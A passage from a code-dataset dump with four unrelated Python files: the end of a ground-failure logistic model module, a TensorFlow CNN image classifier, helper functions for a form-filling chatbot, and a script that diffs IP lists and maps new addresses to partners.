uncert for masked values\n std1[P == 0] = 0.\n if compute_quantiles:\n for q in quantile_dict.values():\n q[P == 0] = 0.\n\n # Stuff into Grid2D object\n if 'Jessee' in self.modelrefs['shortref']:\n if 'coverage' not in self.config[self.model].keys():\n units5 = 'Relative Hazard'\n else:\n units5 = 'Proportion of area affected'\n elif 'Zhu' in self.modelrefs['shortref']:\n if 'coverage' not in self.config[self.model].keys() and \\\n '2017' in self.modelrefs['shortref']:\n units5 = 'Relative Hazard'\n else:\n units5 = 'Proportion of area affected'\n else:\n units5 = 'Probability of any occurrence'\n\n shakedetail = (\n '%s_ver%s'\n % (self.shakedict['shakemap_id'],\n self.shakedict['shakemap_version']))\n description = {\n 'name': self.modelrefs['shortref'],\n 'longref': self.modelrefs['longref'],\n 'units': units5,\n 'shakemap': shakedetail,\n 'event_id': self.eventdict['event_id'],\n 'parameters': {'slopemin': self.slopemin,\n 'slopemax': self.slopemax,\n 'modeltype': self.modeltype,\n 'notes': self.notes}}\n if 'vs30max' in self.config[self.model].keys():\n description['vs30max'] = float(self.config[self.model]['vs30max'])\n if 'minpgv' in self.config[self.model].keys():\n description['minpgv'] = float(self.config[self.model]['minpgv'])\n\n Pgrid = Grid2D(P, self.geodict)\n if self.trimfile is not None:\n # Turn all offshore cells to nan\n Pgrid = trim_ocean(Pgrid, self.trimfile)\n rdict = collections.OrderedDict()\n 
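        # Assemble the ordered results: the 'model' grid goes in first, followed by the optional 'std' and quantile grids and, when saveinputs is True, each input layer and ground-motion grid.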
rdict['model'] = {\n 'grid': Pgrid,\n 'label': '%s estimate - %s' % (self.modeltype.capitalize(),\n units5.title()),\n 'type': 'output',\n 'description': description\n }\n if self.uncert is not None:\n Stdgrid = Grid2D(std1, self.geodict)\n if self.trimfile is not None:\n Stdgrid = trim_ocean(\n Stdgrid, self.trimfile)\n rdict['std'] = {\n 'grid': Stdgrid,\n 'label': ('%s estimate - %s (std)'\n % (self.modeltype.capitalize(),\n units5.title())),\n 'type': 'output',\n 'description': description\n }\n if compute_quantiles:\n for quantile, qgrid in quantile_dict.items():\n Qgrid = Grid2D(qgrid, self.geodict)\n qname = \"quantile%s\" % quantile\n rdict[qname] = {\n 'grid': Qgrid,\n 'label': (\n '%s %sth percentile - %s'\n % (self.modeltype.capitalize(), quantile,\n units5.title())),\n 'type': 'output',\n 'description': description\n }\n\n # This step might swamp memory for higher resolution runs\n if self.saveinputs is True:\n for layername, layergrid in list(self.layerdict.items()):\n units = self.units[layername]\n if units is None:\n units = ''\n rdict[layername] = {\n 'grid': Grid2D(\n layergrid.getSlice(\n None, None, None, None, name=layername),\n self.geodict\n ),\n 'label': '%s (%s)' % (layername, units),\n 'type': 'input',\n 'description': {\n 'units': units,\n 'name': self.shortrefs[layername],\n 'longref': self.longrefs[layername]\n }\n }\n for gmused in self.gmused:\n if 'pga' in gmused:\n units = '%g'\n getkey = 'pga'\n elif 'pgv' in gmused:\n units = 'cm/s'\n getkey = 'pgv'\n elif 'mmi' in gmused:\n units = 'intensity'\n getkey = 'mmi'\n else:\n continue\n # Layer is derived from several input layers, skip\n # outputting this layer\n\n if getkey in rdict:\n continue\n\n layer = self.shakemap[getkey].getSlice(\n None, None, None, None, name=getkey)\n rdict[getkey] = {\n 'grid': Grid2D(layer, self.geodict),\n 'label': '%s (%s)' % (getkey.upper(), units),\n 'type': 'input',\n 'description': {\n 'units': units,\n 'shakemap': shakedetail\n }\n }\n if cleanup:\n shutil.rmtree(self.tempdir)\n return rdict\n\n\ndef getLogisticModelNames(config):\n \"\"\"\n Get the names of the models present in the configobj\n\n Args:\n config: configobj object defining the model and its inputs.\n\n Returns:\n list: list of model names.\n \"\"\"\n names = []\n lmodel_space = config\n for key, value in lmodel_space.items():\n if isinstance(value, str):\n continue\n else: # this is a model\n names.append(key)\n return names\n\n\ndef getAllGridFiles(indir):\n \"\"\"\n Get list of all gmt or esri (.grd, .bil) files in a directory.\n\n Args:\n indir (str): Directory to search.\n Returns:\n list: List of file names.\n \"\"\"\n # TODO MOVE TO MAPIO\n tflist = os.listdir(indir)\n flist = []\n for tf in tflist:\n fullfile = os.path.join(indir, tf)\n ftype = getFileType(fullfile)\n if ftype in ['gmt', 'esri']:\n flist.append(fullfile)\n return flist\n\n\ndef validateCoefficients(cmodel):\n \"\"\"\n Ensures coefficients provided in model description are valid and outputs\n a dictionary of the coefficients.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model,\n for example:\n\n .. 
code-block:: python\n\n cmodel = config['test_model']\n\n Returns:\n dict: a dictionary of model coefficients named b0, b1, b2...\n \"\"\"\n coeffs = {}\n for key, value in cmodel['coefficients'].items():\n if re.search('b[0-9]*', key) is None:\n raise Exception('coefficients must be named b0, b1, ...')\n coeffs[key] = float(value)\n if 'b0' not in list(coeffs.keys()):\n raise Exception('coefficients must include an intercept '\n 'coefficient named b0.')\n return coeffs\n\n\ndef validateClips(cmodel, layers, gmused):\n \"\"\"\n Ensures coefficients provided in model description are valid and outputs\n a dictionary of the coefficients.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model,\n for example:\n\n .. code-block:: python\n\n cmodel = config['test_model']\n layers: dictionary of layer names\n gmused (list): List of ground motion parameters used\n\n Returns:\n dict: a dictionary of clip values for each layer (if exists)\n \"\"\"\n clips = {}\n if 'clip' in cmodel:\n for key, value in cmodel['clip'].items():\n if key not in layers:\n if key not in gmused:\n x1 = [par for par in gmused if key in par]\n if len(x1) == 0:\n raise Exception(\n 'Clipping key %s does not match any layers'\n % key)\n clips[key] = (float(value[0]), float(value[1]))\n return clips\n\n\ndef validateLayers(cmodel):\n \"\"\"\n Ensures all input files required to run the model exist and are valid\n file types. Make sure all layers are available for area of run\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model,\n for example,\n\n .. code-block:: python\n\n cmodel = config['test_model']\n\n Returns:\n dict: a dictionary of file names, e.g.\n\n .. code-block:: python\n\n {\n 'slope': 'slopefile.bil',\n 'vs30': 'vs30.grd'\n }\n\n \"\"\"\n layers = {}\n longrefs = {}\n shortrefs = {}\n for key in cmodel['layers'].keys():\n for item, value in cmodel['layers'][key].items():\n if item == 'file':\n ftype = getFileType(value)\n if ftype == 'unknown':\n raise Exception('layer file %s is not a valid GMT or '\n 'ESRI file.' % value)\n if ftype == 'dir':\n value = getAllGridFiles(value)\n layers[key] = value\n elif item == 'shortref':\n shortrefs[key] = value\n elif item == 'longref':\n longrefs[key] = value\n return layers\n\n\ndef validateTerms(cmodel, coeffs, layers):\n \"\"\"\n Reformats model inputs from config file, replacing functions with numpy\n functions, inserting code for extracting data from each layer (required\n to run eval in the calculate step), addressing any time variables, and\n checks that term names match coefficient names.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model,\n e.g.\n\n .. code-block:: python\n\n cmodel = config['test_model']\n\n coeffs (dict): Dictionary of model coefficients, e.g.\n\n .. code-block:: python\n\n {'b0': 3.5, 'b1': -0.01}\n\n layers (dict): Dictionary of file names for all input layers, e.g.\n\n .. code-block:: python\n\n {'slope': 'slopefile.bil', 'vs30': 'vs30.grd'}\n\n Returns:\n tuple: (terms, timeField), where\n - 'terms' is a dictionary of terms that form the model equation,\n e.g.\n\n .. code-block:: python\n\n {\n 'b1': \"self.layerdict['friction'].getData()\",\n 'b2': \"self.layerdict['slope'].getData()/100.\"\n }\n\n - 'timeField' indicates the time that is used to know which input\n file to read in, e.g. 
for monthly average precipitation, 'MONTH'.\n \"\"\"\n # TODO:\n # - Return a time field for every term, not just one global one.\n\n terms = {}\n timeField = None\n for key, value in cmodel['terms'].items():\n if key not in list(coeffs.keys()):\n raise Exception('Term names must match names of coefficients')\n # replace log with np.log, make sure variables are all in layers list,\n # etc.\n term, rem, tTimeField = checkTerm(value, layers)\n if tTimeField is not None:\n timeField = tTimeField\n if len(rem):\n msg = ('Term \"%s\" contains the unknown text fragment \"%s\". '\n 'This may cause the expression to fail.')\n tpl = (term, rem)\n raise Exception(msg % tpl)\n terms[key] = term\n return terms, timeField\n\n\ndef validateInterpolations(cmodel, layers):\n \"\"\"Validate logistic model interpolation.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model.\n layers (dict): Dictionary of file names for all input layers.\n\n Returns:\n dict: Model interpolation methods.\n \"\"\"\n interpolations = {}\n for key, value in cmodel['interpolations'].items():\n if key not in list(layers.keys()):\n raise Exception(\n 'Interpolation key %s does not match any names of layers'\n % key)\n methods = ['linear', 'nearest', 'cubic', 'bilinear']\n if value not in methods:\n raise Exception(\n 'Interpolation method %s not in approved list of methods: %s'\n % (key, str(methods)))\n interpolations[key] = value\n for key in list(layers.keys()):\n if key not in list(interpolations.keys()):\n raise Exception(\n 'No interpolation method configured for layer %s' % key)\n return interpolations\n\n\ndef validateUnits(cmodel):\n \"\"\"Validate model units.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model.\n\n Returns:\n dict: Model units.\n \"\"\"\n units = {}\n for key in cmodel['layers'].keys():\n if 'units' in cmodel['layers'][key]:\n units[key] = cmodel['layers'][key]['units']\n else:\n raise Exception('No unit string configured for layer %s' % key)\n return units\n\n\ndef validateRefs(cmodel):\n \"\"\"Validate references for models and layers.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model.\n\n Returns:\n tuple: (modelrefs, longrefs, shortrefs) where:\n * modelrefs: dictionary of citation information for model\n keys='longref', 'shortref'\n * shortrefs: dictionary containing short reference for each\n input layer\n * longrefs: dictionary containing full references for each\n input layer\n\n \"\"\"\n longrefs = {}\n shortrefs = {}\n modelrefs = {}\n for key in cmodel['layers'].keys():\n if 'longref' in cmodel['layers'][key]:\n longrefs[key] = cmodel['layers'][key]['longref']\n else:\n print('No longref provided for layer %s' % key)\n longrefs[key] = 'unknown'\n if 'shortref' in cmodel['layers'][key]:\n shortrefs[key] = cmodel['layers'][key]['shortref']\n else:\n print('No shortref provided for layer %s' % key)\n shortrefs[key] = 'unknown'\n try:\n modelrefs['longref'] = cmodel['longref']\n except BaseException:\n print('No model longref provided')\n modelrefs['longref'] = 'unknown'\n try:\n modelrefs['shortref'] = cmodel['shortref']\n except BaseException:\n print('No model shortref provided')\n modelrefs['shortref'] = 'unknown'\n return modelrefs, longrefs, shortrefs\n\n\ndef checkTerm(term, layers):\n \"\"\"Checks terms of equation and replaces text with machine readable\n operators\n\n Args:\n term: term from model configuration file\n layers: dictionary of file names for all input layers\n\n Returns:\n tuple: (term, tterm, timeField) 
where:\n * term: dictionary of verified terms for equation with keys\n corresponding to each layer name\n * tterm: any unconverted and unverified text that may cause\n expression to fail\n * timeField: if any inputs are time dependent, output is unit of\n time (e.g., 'YEAR'), otherwise, None.\n \"\"\"\n # startterm = term\n # Strip out everything that isn't: 0-9.() operators, +-/* or layer names.\n # Anything left is an unknown symbol.\n tterm = term\n # remove log, sqrt, etc.\n for op in OPERATORS:\n tterm = tterm.replace(op, '')\n # remove ShakeMap variables\n for sm_term in SM_TERMS:\n tterm = tterm.replace(sm_term, '')\n # remove layer names\n for layer in layers:\n tterm = tterm.replace(layer, '')\n # remove arithmetic operators\n tterm = re.sub(OPERATORPAT, '', tterm)\n # remove floating point numbers\n tterm = re.sub(FLOATPAT, '', tterm)\n # remove integer numbers\n tterm = re.sub(INTPAT, '', tterm)\n # remove parentheses\n tterm = re.sub('[()]*', '', tterm)\n # remove any blank spaces\n tterm = tterm.strip()\n # remove commas\n tterm = tterm.strip(',')\n # anything left *might* cause an error\n for op in OPERATORS:\n if term.find(op) > -1:\n term = term.replace(op, 'np.' + op)\n\n for sm_term in SM_GRID_TERMS:\n term = term.replace(\n sm_term,\n \"self.shakemap['%s'].getSlice(rowstart, rowend, \"\n \"colstart, colend, name='%s')\" % (sm_term, sm_term))\n\n # replace the macro MW with the magnitude value from the shakemap\n term = term.replace('MW', \"self.eventdict['magnitude']\")\n\n # term.replace('YEAR',\"self.shakemap.getEventDict()['event_time'].year\")\n # hasTime = False\n timeField = None\n for unit in ['YEAR', 'MONTH', 'DAY', 'HOUR']:\n if term.find(unit) > -1:\n term = term.replace(unit, '')\n timeField = unit\n\n for layer in layers:\n if layer == 'friction':\n term = term.replace(\n layer,\n \"np.nan_to_num(self.layerdict['%s'].getSlice(rowstart, \"\n \"rowend, colstart, colend, name='%s'))\" % (layer, layer))\n else:\n term = term.replace(\n layer,\n \"self.layerdict['%s'].getSlice(rowstart, rowend, colstart, \"\n \"colend, name='%s')\" % (layer, layer))\n return term, tterm, timeField\n","sub_path":"gfail/logisticmodel.py","file_name":"logisticmodel.py","file_ext":"py","file_size_in_byte":42305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455722687","text":"import tensorflow as tf\nimport numpy as np\nfrom utils import getImage\n\nclass cnn:\n def __init__(self):\n self.x = tf.placeholder(tf.float32,[None,256,256,3])\n self.y_ = tf.placeholder(tf.float32,[None,2])\n self.conv_strides = [1,1,1,1]\n self.ksize = [1,2,2,1]\n self.pool_strides = [1,2,2,1]\n self.y = self.build_model()\n\n # TO-DO - Setters\n\n # Weights of the neurons\n def Weight(self,shape,dev=0.1):\n initial = tf.truncated_normal(shape,mean=0,stddev=dev)\n return tf.Variable(initial)\n\n # Bias for the layers\n def bias(self,shape,c=0.1):\n initial = tf.constant(c,shape=shape)\n return tf.Variable(initial)\n\n # Conv layer \n # x is the input\n # W is the filter / kernel of the cnn layer\n def conv2d(self,x, W, strides, padding='SAME'):\n conv = tf.nn.conv2d(x, W, strides=strides, padding=padding)\n return conv\n\n # Max Pool the output of the conv layer\n def max_pool(self,x,padding='SAME'):\n pool = tf.nn.max_pool(x, ksize=self.ksize, strides=self.pool_strides, padding=padding)\n return pool\n\n # Weights & Biases\n def set_weights_biases(self,weight_shape,bias_shape):\n W = self.Weight(weight_shape)\n b = self.bias(bias_shape)\n return 
W,b\n \n def build_model(self):\n x_image = tf.reshape(self.x,[-1,256,256,3])\n\n W1, b1 = self.set_weights_biases([2,2,3,32],[32])\n W2, b2 = self.set_weights_biases([2,2,32,64],[64])\n\n h_conv1 = self.conv2d(x_image,W1,self.conv_strides) + b1\n relu1 = tf.nn.relu(h_conv1)\n pool1 = self.max_pool(relu1)\n\n h_conv2 = self.conv2d(pool1,W2,self.conv_strides) + b2\n relu2 = tf.nn.relu(h_conv2)\n pool2 = self.max_pool(relu2)\n\n W3,b3 = self.set_weights_biases([64*64*64,1024],[1024]) # For fully connected layer\n pool2_flat = tf.reshape(pool2, [-1, 64*64*64])\n matmul = tf.matmul(pool2_flat, W3) + b3\n fc_layer = tf.nn.relu(matmul)\n\n W4,b4 = self.set_weights_biases([1024,2],[2]) # Last layer\n y = tf.matmul(fc_layer,W4) + b4\n return y\n \n def train(self,train_path,validation_path,steps):\n image,label = getImage(train_path)\n v_image,v_label = getImage(validation_path)\n\n image_batch, label_batch = tf.train.shuffle_batch(\n [image, label], batch_size=32,\n capacity=450,\n min_after_dequeue=150)\n \n val_image_batch, val_label_batch = tf.train.shuffle_batch(\n [v_image, v_label], batch_size=32,\n capacity=50,\n min_after_dequeue=25)\n \n cross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.y_, logits=self.y))\n correct_prediction = tf.equal(tf.argmax(self.y,1), tf.argmax(self.y_,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\n with tf.Session() as sess:\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n coord=tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess,coord=coord)\n for i in range(steps):\n train_images, train_labels = sess.run([image_batch,label_batch])\n if i%10 == 0:\n val_images, val_labels = sess.run([val_image_batch, val_label_batch])\n train_accuracy = sess.run([accuracy], feed_dict={self.x:val_images, self.y_:val_labels})\n print(\"Step : {}, Training Accuracy : {}\".format(i+1, train_accuracy[0]))\n _, loss = sess.run([train_step,cross_entropy],feed_dict={self.x:train_images, self.y_:train_labels})\n print('Step : {} , Loss : {}'.format(i+1,loss))\n\n coord.request_stop()\n coord.join(threads)\n sess.close()\n","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"586336169","text":"# functions self contained and others used to restitute formated strings\nimport styles\nimport utility as u\nimport compatible as c\n\n\ndef extract_fields_names_and_values(entities, only_names=False):\n try:\n count = len(entities)\n slot_name_list = []\n slot_value_list = []\n for index in range(count):\n newDict = {\n \"value\": entities[index][\"value\"],\n \"entity\": entities[index][\"entity\"]\n }\n if \"input_field\" in newDict[\"entity\"]:\n # it means that the entity is a field's name, a slot name\n slot_name_list.append(newDict['value'])\n else:\n # it means that the entity is field's value, a slot value\n slot_value_list.append(newDict['value'])\n if only_names:\n return slot_name_list\n else:\n return slot_name_list, slot_value_list\n except:\n print('Fail to extract the names and values for an entity')\n raise Exception\n\n\ndef get_string_from_list(my_list):\n # Formats a list into a string and restitutes it\n try:\n string = \"\"\n for e in my_list:\n if string == \"\":\n string = e\n else:\n string = f'{string}, {e}'\n return string\n 
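        # note: for lists of strings this accumulation is equivalent to ', '.join(my_list)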
except:\n        print(\"Fail to get the string from a list\")\n        raise Exception\n\n\ndef is_compatible(slot_value, slot):\n    # Verifies the compatibility between the user input and the value type that it should have\n    try:\n        # if no modification is done we return the slot_value\n        text = slot_value\n        value_type = slot[u.value_type]\n        # list of types that we are handling\n        types_list = [u.date, u.password, u.email, u.number, u.tel, u.time, u.integer, u.decimal, u.month_type]\n        if value_type in types_list:\n            if value_type == u.email:\n                return c.verify_compatibility_email(slot_value)\n            if value_type == u.password:\n                return c.verify_compatibility_password(slot_value)\n            if value_type == u.tel:\n                return c.verify_compatibility_tel(slot_value)\n            if value_type == u.date:\n                return c.verify_compatibility_date(slot_value)\n            if value_type == u.month_type:\n                text = f'Sorry the type {u.month_type} is not supported, consequently the field {slot[u.slot_name]} cannot be completed'\n                return False, text\n            if value_type == u.time:\n                return c.verify_compatibility_time(slot_value)\n            if value_type in u.number_types_list:\n                min_value = slot[u.min_value]\n                max_value = slot[u.max_value]\n                if value_type == u.number:\n                    return c.verify_compatibility_number(slot_value, min_value, max_value)\n                if value_type == u.integer:\n                    return c.verify_compatibility_integer(slot_value, min_value, max_value)\n                if value_type == u.decimal:\n                    precision = slot[u.precision]\n                    return c.verify_compatibility_decimal(slot_value, precision, min_value, max_value)\n        else:\n            return c.verify_compatibility_generic(slot_value)\n        return True, text\n    except:\n        print(\"A problem occurred while verifying the compatibility of the value {} for the type {}\".format(\n            slot_value, value_type))\n        raise Exception\n\n\ndef convert_to_int(string, tag=u.normal):\n    try:\n        # return a string that can be cast to int but not an int\n        num_list = u.number_0_9\n        special = [' ', '.', ',']\n        new_string = string\n        for char in string:\n            if char in special:\n                # remove every separator character from the working copy\n                new_string = new_string.replace(char, '')\n            elif char not in num_list:\n                return None\n        try:\n            value = int(new_string)\n        except:\n            if u.DEBUG:\n                print(f'The string {string} cannot be converted to an integer')\n            return None\n        if tag == u.year:\n            if value not in range(u.min_year, u.max_year+1):\n                return None\n        elif tag == u.month:\n            if value not in range(u.min_month, u.max_month+1):\n                return None\n        elif tag == u.day:\n            if value not in range(u.min_day, u.max_day+1):\n                return None\n        elif tag == u.hour:\n            if value not in range(u.min_hour, u.max_hour+1):\n                return None\n        elif tag == u.minute:\n            if value not in range(u.min_minute, u.max_minute+1):\n                return None\n        return new_string\n    except:\n        print(f'Fail to convert the value {string} into an integer form')\n        raise Exception\n\n\ndef get_pairs(slots, only_filled=False):\n    try:\n        string = \"\"\n        text = \"{} : {}\"\n        for slot in slots:\n            slot_name = slot[u.slot_name]\n            if slot_name != u.REQUESTED_SLOT:\n                if slot[u.required]:\n                    slot_name = f'*{slot_name}'\n                slot_value = slot[u.slot_value]\n                if slot_value is not None or not only_filled:\n                    # we do not enter when we are searching for only completed fields (only_filled = True) and the value is None\n                    if string == '':\n                        string = f\"{string}\\t{text.format(slot_name, slot_value)}\"\n                    else:\n                        string = f\"{string}\\n\\t{text.format(slot_name, slot_value)}\"\n        return string\n    except:\n        print(\"Fail to get the pairs\")\n        raise Exception\n\n\ndef verify_presence(name, slots, only_presence=False, only_text=False):\n    try:\n        possible_names = []\n        for slot in 
slots:\n slot_name = slot[u.slot_name]\n possible_names.append(slot_name)\n if name in possible_names:\n text = f\"The field {name} is present.\"\n if only_presence:\n return True\n elif only_text:\n return text\n else:\n return text, True\n alternatives = []\n for pos in possible_names:\n if name in pos:\n alternatives.append(pos)\n if len(alternatives) > 0:\n string_alt = get_string_from_list(alternatives)\n if len(alternatives) == 1:\n text = f\"The field {name} is not present but you have this alternative {string_alt}.\"\n else:\n text = f\"The field {name} is not present but you have these alternatives {string_alt}.\"\n if only_presence:\n return False\n elif only_text:\n return text\n else:\n return text, False\n sorry_style = styles.get_sorry()\n text = f\"The field {name} is not present {sorry_style}\"\n if only_presence:\n return False\n elif only_text:\n return text\n else:\n return text, False\n except:\n print(f'Fail to verify the presence of {name}')\n raise Exception\n\n\ndef get_input_fields(form_element):\n # return the list of slots containing matching of input_field name with input_value name\n # also returns the number of required camps and the total number of camps\n try:\n elems_input = form_element.find_elements_by_xpath(\".//input\")\n elems_dropdown = form_element.find_elements_by_xpath(\".//select\")\n elems_textarea = form_element.find_elements_by_xpath(\".//textarea\")\n elems = elems_input + elems_dropdown + elems_textarea\n slots = []\n for elem in elems:\n field = elem.get_attribute(u.bot_field)\n if field is not None:\n value_name = elem.get_attribute('name')\n value_type = elem.get_attribute(u.field_type)\n description = elem.get_attribute(u.field_desc)\n if not value_type:\n # the bot-type would be the same as the input type, so we avoid putting it\n value_type = elem.get_attribute('type')\n if elem.get_attribute(u.required) is not None:\n if value_type == u.month_type:\n # this type (month) is not supported so we force it to be optional\n required = False\n else:\n required = True\n else:\n required = False\n if elem.get_attribute(u.field_spelling) is not None and u.USE_SPELLING:\n spelling = True\n else:\n spelling = False\n slot = {\n u.slot_value: None, # value corresponding to a label\n u.slot_name: field.lower(), # label\n u.value_name: value_name, # name_id of the value camp for a label\n u.value_type: value_type, # type tha the value should have\n u.required: required, # is the filling of a label required or not\n u.description: description, # description/explanation of a field\n u.spelling: spelling\n }\n # in case of field with choices, we insert the list of choices\n if value_type in u.choices_type_list:\n choice_list = get_choice_list(\n value_name, value_type, form_element)\n slot[u.choice_list] = choice_list\n # in case of numbers we have to define the min, max and step\n if value_type in u.number_types_list:\n min_value = elem.get_attribute('min')\n if min_value is None:\n min_value = - float('inf')\n max_value = elem.get_attribute('max')\n if max_value is None:\n max_value = float('inf')\n if slot[u.value_type] == u.decimal:\n precision = float('inf')\n min_value = float(min_value)\n max_value = float(max_value) \n elif slot[u.value_type] in [u.integer, u.number]:\n precision = 0\n min_value = int(min_value)\n max_value = int(max_value)\n step = elem.get_attribute('step')\n if step is not None and step != u.VOID:\n step = float(step)\n precision = 0\n while step < 1:\n step *= 10\n precision += 1\n slot[u.min_value] = min_value\n 
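                    # min/max were defaulted to -inf/+inf above when the element lacks 'min'/'max' attributes, and a fractional 'step' (e.g. '0.01') set the decimal precision just computed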
slot[u.max_value] = max_value\n                    slot[u.precision] = precision\n                # we add the slot in the list of slots\n                slots.append(slot)\n                #slots = [slot] + slots\n        # we save the form description and title inside the requested slot\n        description = form_element.get_attribute(u.bot_desc)\n        title = form_element.get_attribute(u.bot_title)\n        requested_slot = {\n            u.slot_value: slots[0][u.slot_name],\n            u.slot_name: u.REQUESTED_SLOT,\n            u.description: description,\n            u.title: title\n        }\n        slots.append(requested_slot)\n        return slots\n    except:\n        print(\"Fail to extract the names of the form's input fields\")\n        raise Exception\n\n\ndef get_choice_list(choice_name, choice_type, web_elem):\n    try:\n        if choice_type == u.dropdown:\n            name = choice_name.lower()\n            elem = web_elem.find_element_by_name(name)\n            choice_list = []\n            options = elem.find_elements_by_xpath(\".//option\")\n            for option in options:\n                choice_list.append(option.text)\n        elif choice_type in [u.radio, u.checkbox]:\n            name = choice_name.lower()\n            elems = web_elem.find_elements_by_name(name)\n            choice_list = []\n            for elem in elems:\n                value = elem.get_attribute(\"value\")\n                choice_list.append(value)\n        return choice_list\n    except:\n        print(f'Fail to get the list for the slot {choice_name}')\n        raise Exception\n\n\ndef get_required_string(required):\n    if required:\n        req = \"This field is required.\"\n    else:\n        req = \"This field is optional.\"\n    return req\n\n\ndef is_required(element):\n    # verifies if a form_element element (corresponds to an input in our case) is required or not\n    value = element.get_attribute(u.required)\n    if value is not None:\n        return True\n    else:\n        return False\n\n\ndef get_proposals(values):\n    try:\n        text = '{} - {}'\n        string = ''\n        first = True\n        for index in range(len(values)):\n            if first:\n                string = text.format(index, values[index])\n                first = False\n            else:\n                string = f'{string}\\t{text.format(index, 
values[index])}'\n        return string\n    except:\n        print('Fail to get the proposals')\n        raise Exception\n\n\ndef get_num_fields(constructs):\n    try:\n        slots = constructs[\"form\"][\"slots\"]\n        total = 0\n        required = 0\n        optional = 0\n        for slot in slots:\n            if slot[u.slot_name] != u.REQUESTED_SLOT:\n                total = total + 1\n                if slot[u.required]:\n                    required = required + 1\n                else:\n                    optional = optional + 1\n        return total, required, optional\n    except:\n        print('Fail to get the number of fields')\n        raise Exception\n\n\ndef next_char_string():\n    try:\n        # we add styles to the output\n        next_style = styles.get_next()\n        please_style = styles.get_please()\n        insert_style = styles.get_insert()\n        end_style = styles.get_end()\n        # we set the message to be returned to the user\n        string = (f'{please_style} {insert_style} the {next_style} character, remember that you can use the expression SPACE for the blank' +\n                  f' and the expression TERMINATE to {end_style} the spelling')\n        return string\n    except:\n        print('Fail to get the string for asking the next character')\n        raise Exception\n\n\ndef get_fuunctionalities_list():\n    try:\n        text_functionalities = ''\n        for fun in u.functionalities_list:\n            if text_functionalities == '':\n                text_functionalities = f'- {fun}'\n            else:\n                text_functionalities = f'{text_functionalities}\\n- {fun}'\n        return text_functionalities\n    except:\n        print('Fail to get the list of functionalities')\n        raise Exception","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":14816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"421193203","text":"import argparse\nimport csv\nimport netaddr\nimport collections\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-o', '--old')\n\tparser.add_argument('-n', '--new')\n\tparser.add_argument('-c', '--csv')\n\targs = parser.parse_args()\n\n\tif args.old is None or args.new is None or args.csv is None:\n\t\tparser.print_help()\n\t\texit()\n\n\t# create sets of old scope and new scope\n\told = loadfile(args.old)\n\tnew = loadfile(args.new)\n\n\t# get diff between the two sets and write to file\n\t# diff is list of hosts that are present in \"new\" but NOT in \"old\"\n\t#diff = list(old.symmetric_difference(new))\n\tdiff = list(new - old)\n\tprint(\"new ips found\\n=============\\n%s\\n\" % len(diff))\n\twritefile(diff, 'diff.txt')\n\n\t# create scope map dict from given scope\n\t# csv needs to be formatted as ip address in column1 and partner in column2\n\tscopemap = readcsv(args.csv)\n\tdictadd = {}\n\n\t# iterate through scopemap and breakout cidr addresses\n\t# make temp dict to hold breakout addresses\n\tfor key, value in scopemap.items():\n\t\ttry:\n\t\t\tip = netaddr.IPNetwork(key)\n\t\t\tiplist = list(ip)\n\t\t\tfor ip in iplist:\n\t\t\t\tdictadd.update({str(ip) : value})\n\t\texcept Exception as e:\n\t\t\t#print(e)\n\t\t\tcontinue\n\n\t# add temp dict to master scopemap\n\tscopemap.update(dictadd)\n\n\t# format csv output\n\tcsvfile = open('output.csv', 'w')\n\tcsvfile.write(\"IP Address,Partner\\n\")\n\tpartners = []\n\n\t# do dict lookup to get partner by diff'd ip\n\t# write values to csv\n\tfor ip in diff:\n\t\tcsvfile.write(\"%s,%s\\n\" % (ip, scopemap.get(ip)))\n\t\tpartners.append(scopemap.get(ip))\n\n\t# print verbose to user\n\tc = collections.Counter(partners)\n\tprint(\"Breakdown by partner\\n====================\")\n\tfor key, value in c.items():\n\t\tprint(key, value)\n\n# load file content into a set\ndef loadfile(filename):\n\twith 
open(filename, 'r') as f:\n\t\treturn set(line.strip() for line in f)\n\n# write list to a file\ndef writefile(writelist, filename):\n\twith open(filename, 'w') as diff:\n\t\tfor item in writelist:\n\t\t\tdiff.write(\"%s\\n\" % item)\n\n# read csv contents into dict\n# csv needs to be formatted as ip address in column1 and partner in column2\ndef readcsv(filename):\n\twith open(filename,newline='') as scopefile:\n\t\treader = csv.reader(scopefile)\n\t\tnext(reader)\n\t\tresults = dict(reader)\n\t\treturn results\n\nif __name__ == \"__main__\":\n    main()","sub_path":"ipdiff.py","file_name":"ipdiff.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
